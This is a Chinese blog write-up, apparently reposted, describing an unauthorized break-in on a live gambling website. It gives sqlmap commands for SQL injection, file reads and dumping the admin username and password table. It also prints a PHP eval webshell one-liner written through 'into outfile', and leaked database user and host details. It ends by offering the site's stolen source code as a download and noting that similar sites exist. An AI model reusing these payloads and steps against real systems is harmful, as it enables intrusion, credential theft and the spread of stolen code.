【渗透实战系列】|11 - 赌博站人人得而诛之

  • A+
所属分类:安全文章

【渗透实战系列】|11 - 赌博站人人得而诛之

涉及知识点:

1、bp抓包找注入点2、sqlmap使用3、端口扫描,寻找后台4、目录扫描,寻找可注入页面5、注入获得数据库root权限6、sqlmap写一句话木马7、sqlmap读取文件8、注入获取管理员账号、密码9、域名解析10、thinkphp写马


偶遇一棋牌网站

【渗透实战系列】|11 - 赌博站人人得而诛之


1、简单的抓包分析一下

【渗透实战系列】|11 - 赌博站人人得而诛之


2、用户名后边加单引号直接报错了,闭合之后又正常了,稳稳地sql注入一枚。

3、通过测试没有发现任何安全设备,直接上sqlmap。

4、过程就不啰嗦了,直接得到下边数据

current-user:  [email protected]%select @@BASEDIR: '/usr/'select USER(): '[email protected]'select DATABASE(): 'edc'select SYSTEM_USER(): '[email protected]'select @@CHARACTER_SETS_DIR: '/usr/share/mysql/charsets/'select @@CHARACTER_SET_CLIENT: 'utf8'select @@DATADIR: '/var/lib/mysql/'select @@CHARACTER_SET_SERVER: 'latin1'


5、通过一波信息收集,当前用户权限很低,有用的信息少得可怜

6、对目标端口进行扫描,发现端口开了挺多

【渗透实战系列】|11 - 赌博站人人得而诛之

7、打开80端口没有任何页面

【渗透实战系列】|11 - 赌博站人人得而诛之


888 端口  是apache默认首页  得到绝对路径 /var/www/html/9090 端口 是赌博站管理登录地址9091 端口 是赌博站会员登录地址

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|11 - 赌博站人人得而诛之

8、经过测试,这个两个页面没有可利用的漏洞

### 突破点


9、通过对目录进行扫描发现一个报错页面,得到一个注入点还得到一个info.php

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|11 - 赌博站人人得而诛之

10、拿到数据库root权限

【渗透实战系列】|11 - 赌博站人人得而诛之


db_test  当前数据库[19:54:48] [INFO] resumed: 'root'@'localhost'[19:54:48] [INFO] resumed: 'developer'@'localhost'[19:54:48] [INFO] resumed: 'root'@'127.0.0.1'[19:54:48] [INFO] resumed: 'syncopy'@'222.xxx.xxx.xxx'[19:54:48] [INFO] resumed: 'mlh'@'localhost'[19:54:48] [INFO] resumed: 'developer'@'%'[19:54:48] [INFO] resumed: 'mlh'@'%'[19:54:48] [INFO] resumed: 'edc'@'%'[19:54:48] [INFO] resumed: '6hc_nav'@'%'


【渗透实战系列】|11 - 赌博站人人得而诛之

### 尝试写入shell


11、通过sql语句写入shell却没有成功,只有在支持堆叠查询时,才能执行非查询SQL语句


sqlmap --sql-shellselect "<?php eval($_POST['x']);?>" into outfile "/var/www/html/25u_ft/1.php"


【渗透实战系列】|11 - 赌博站人人得而诛之



12、换一种方式写入


--file-write "/localhost/shell.php" --file-dest "/var/www/html/25u_ft/test.php"


13、完全写不进去,发现是没有写入权限,只有读取权限


--file-read "/var/www/html/25u_ft/info.php"


14、可以正常读取,尝试读取配置文件,至此走上了一条错误之路


【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|11 - 赌博站人人得而诛之


(1)读取了几个配置文件,并没有什么思路


(2)回头去注入管理员的密码,尝试从后台获取shell


-D "10fenft" -T "g_user" -C "g_name,g_password" --dump

【渗透实战系列】|11 - 赌博站人人得而诛之




(3)成功登录后台

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|11 - 赌博站人人得而诛之


(4)后台简陋的一批,没有上传功能

    ### getshell


(5)该有的条件都有了就是拿不到shell,很难受。


(6)在各种渠道查询这个ip,突然发现以前有域名解析到这里

【渗透实战系列】|11 - 赌博站人人得而诛之


(7)太好了,域名还可以正常访问,是一个论坛

【渗透实战系列】|11 - 赌博站人人得而诛之


(8)竟然是thinkphp,而且还爆出了绝对路径


(9)重复之前的写入操作,一下就成功了,哈哈哈哈

【渗透实战系列】|11 - 赌博站人人得而诛之

### 打包源码


(10)直接链接shell

【渗透实战系列】|11 - 赌博站人人得而诛之


(11)权限不高,但是丝毫不影响我打包源码

【渗透实战系列】|11 - 赌博站人人得而诛之

### 总结
发现还要很多同类型的站点
源码放在下边了

【渗透实战系列】|11 - 赌博站人人得而诛之25u_new.rar (10.481 MB) 下载附件



转载于https://xz.aliyun.com/t/9567

推荐阅读:



渗透实战系列


【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透实战测试(非常详细,适合打战练手)

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙(文末附【渗透实战系列】其他文章链接)

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)


【渗透实战系列】|11 - 赌博站人人得而诛之

长按-识别-关注

【渗透实战系列】|11 - 赌博站人人得而诛之

Hacking黑白红

一个专注信息安全技术的学习平台

【渗透实战系列】|11 - 赌博站人人得而诛之

点分享

【渗透实战系列】|11 - 赌博站人人得而诛之

点收藏

【渗透实战系列】|11 - 赌博站人人得而诛之

点点赞

【渗透实战系列】|11 - 赌博站人人得而诛之

点在看




本文始发于微信公众号(Hacking黑白红):【渗透实战系列】|11 - 赌博站人人得而诛之

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: